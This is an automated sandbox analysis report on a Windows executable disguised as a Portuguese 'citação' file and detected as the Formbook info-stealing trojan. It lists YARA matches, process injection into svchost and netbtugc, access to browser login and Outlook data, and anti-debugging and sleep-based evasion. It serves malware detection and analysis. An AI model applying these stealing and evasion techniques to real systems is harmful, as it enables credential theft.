            Source: 00000001.00000002.2006339526.0000000007BD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2001885118.0000000002670000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.4152933454.00000000041F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2002697433.0000000005290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@14/11
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,0_2_004755C4
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_0046CB5F OleInitialize,CLSIDFromProgID,CLSIDFromString,CoCreateInstance,CoInitializeSecurity,_wcslen,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_0046CB5F
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeFile created: C:\Users\user\AppData\Local\Temp\carryover
            Source: CITA#U00c7#U00c3O.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeFile read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: netbtugc.exe, 00000006.00000002.4151687754.00000000031D1000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2282999847.00000000031B0000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2283949430.00000000031D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: CITA#U00c7#U00c3O.exeReversingLabs: Detection: 63%
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeFile read: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe
            Source: unknownProcess created: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe "C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe"
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe"
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe"
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeSection loaded: apphelp.dll
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeSection loaded: wsock32.dll
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeSection loaded: version.dll
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeSection loaded: winmm.dll
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeSection loaded: mpr.dll
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeSection loaded: wininet.dll
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeSection loaded: userenv.dll
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeSection loaded: wldp.dll
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeSection loaded: msdart.dll
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeSection loaded: sxs.dll
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wininet.dll
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netutils.dll
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: mlang.dll
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: propsys.dll
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: cryptbase.dll
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exeSection loaded: wininet.dll
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exeSection loaded: mswsock.dll
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exeSection loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exeSection loaded: rasadhlp.dll
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exeSection loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: CITA#U00c7#U00c3O.exeStatic file information: File size 1353653 > 1048576
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: DJonRIGNYjBRZ.exe, 00000005.00000000.1913555619.00000000007EE000.00000002.00000001.01000000.00000005.sdmp, DJonRIGNYjBRZ.exe, 00000007.00000002.4151235223.00000000007EE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: CITA#U00c7#U00c3O.exe, 00000000.00000003.1778079460.0000000004770000.00000004.00001000.00020000.00000000.sdmp, CITA#U00c7#U00c3O.exe, 00000000.00000003.1776550231.00000000045D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2002269584.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1890366251.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1892230836.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2002269584.000000000319E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4153269474.000000000373E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4153269474.00000000035A0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2004390893.00000000033F1000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2002161958.0000000003247000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: CITA#U00c7#U00c3O.exe, 00000000.00000003.1778079460.0000000004770000.00000004.00001000.00020000.00000000.sdmp, CITA#U00c7#U00c3O.exe, 00000000.00000003.1776550231.00000000045D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2002269584.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1890366251.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1892230836.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2002269584.000000000319E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000006.00000002.4153269474.000000000373E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4153269474.00000000035A0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2004390893.00000000033F1000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2002161958.0000000003247000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000001.00000003.1971008529.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2002077943.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, DJonRIGNYjBRZ.exe, 00000005.00000003.1951321125.00000000008AB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000006.00000002.4153839675.0000000003BCC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4151687754.000000000314E000.00000004.00000020.00020000.00000000.sdmp, DJonRIGNYjBRZ.exe, 00000007.00000002.4153318134.000000000329C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2397067589.000000000C51C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000006.00000002.4153839675.0000000003BCC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4151687754.000000000314E000.00000004.00000020.00020000.00000000.sdmp, DJonRIGNYjBRZ.exe, 00000007.00000002.4153318134.000000000329C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2397067589.000000000C51C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000001.00000003.1971008529.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2002077943.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, DJonRIGNYjBRZ.exe, 00000005.00000003.1951321125.00000000008AB000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
            Source: CITA#U00c7#U00c3O.exeStatic PE information: real checksum: 0xa961f should be: 0x1538ff
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_00462463 push edi; ret 0_2_00462465
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0267D211 pushad ; ret 1_2_0267D212
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_026832A3 push esi; ret 1_2_026832A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0268136F push edi; retf 1_2_02681372
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02673060 push eax; ret 1_2_02673062
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_026860FC push 00000030h; retf 1_2_02686149
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0268789B push C5503231h; retf 1_2_026878A3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0268613C push 00000030h; retf 1_2_02686149
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0268E67B push ebp; retf 1_2_0268E67D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0268E61E push eax; retf 1_2_0268E647
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_026716F6 push ss; ret 1_2_02671859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0268E6DA pushad ; ret 1_2_0268E6DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02671FF6 push ecx; ret 1_2_02671FFF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02687FCB push edx; iretd 1_2_02687FCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02687CFB push 789F05E2h; iretd 1_2_02687D02
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_026835E3 push ds; retf 1_2_026835F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_026835D8 push ds; retf 1_2_026835F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02684594 push edi; retf 1_2_026845B7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300225F pushad ; ret 1_2_030027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030027FA pushad ; ret 1_2_030027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030309AD push ecx; mov dword ptr [esp], ecx1_2_030309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300283D push eax; iretd 1_2_03002858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300135E push eax; iretd 1_2_03001369
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_035D09AD push ecx; mov dword ptr [esp], ecx6_2_035D09B6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02B60240 push esi; ret 6_2_02B60245
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02B5E30C push edi; retf 6_2_02B5E30F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02B60580 push ds; retf 6_2_02B6058D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02B7452B push ds; iretd 6_2_02B7454B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02B60575 push ds; retf 6_2_02B6058D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02B64838 push C5503231h; retf 6_2_02B64840
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | API/Special instruction interceptor: Address: 3F74ADC
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0307096E rdtsc 1_2_0307096E
            Source: C:\Windows\SysWOW64\netbtugc.exe | Window / User API: threadDelayed 3380
            Source: C:\Windows\SysWOW64\netbtugc.exe | Window / User API: threadDelayed 6594
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-85765
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | API coverage: 3.7 %
            Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\netbtugc.exe | API coverage: 2.8 %
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6872 | Thread sleep count: 3380 > 30
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6872 | Thread sleep time: -6760000s >= -30000s
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6872 | Thread sleep count: 6594 > 30
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6872 | Thread sleep time: -13188000s >= -30000s
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe TID: 7124 | Thread sleep time: -75000s >= -30000s
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe TID: 7124 | Thread sleep count: 33 > 30
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe TID: 7124 | Thread sleep time: -49500s >= -30000s
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe TID: 7124 | Thread sleep count: 32 > 30
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe TID: 7124 | Thread sleep time: -32000s >= -30000s
            Source: C:\Windows\SysWOW64\netbtugc.exe | Last function: Thread delayed
            Source: C:\Windows\SysWOW64\netbtugc.exe | Last function: Thread delayed
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00452492
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00442886
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_004788BD
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_004339B6
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose, 0_2_0045CAFA
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00431A86
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, 0_2_0044BD27
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_0045DE8F FindFirstFileW,FindClose, 0_2_0045DE8F
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_0044BF8B
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_02B6C2C0 FindFirstFileW,FindNextFileW,FindClose, 6_2_02B6C2C0
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary, 0_2_0040E500
            Source: firefox.exe, 00000008.00000002.2398782659.000001788C51C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll::Q
            Source: DJonRIGNYjBRZ.exe, 00000007.00000002.4151858709.00000000011B9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll`
            Source: netbtugc.exe, 00000006.00000002.4151687754.000000000314E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | API call chain: ExitProcess graph end node graph_0-84893
            Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0307096E rdtsc 1_2_0307096E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_026872B3 LdrLoadDll, 1_2_026872B3
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_0045A370 BlockInput, 0_2_0045A370
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW, 0_2_0040D590
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress, 0_2_0040EBD0
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_03F73718 mov eax, dword ptr fs:[00000030h] 0_2_03F73718
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_03F715A0 mov eax, dword ptr fs:[00000030h] 0_2_03F715A0
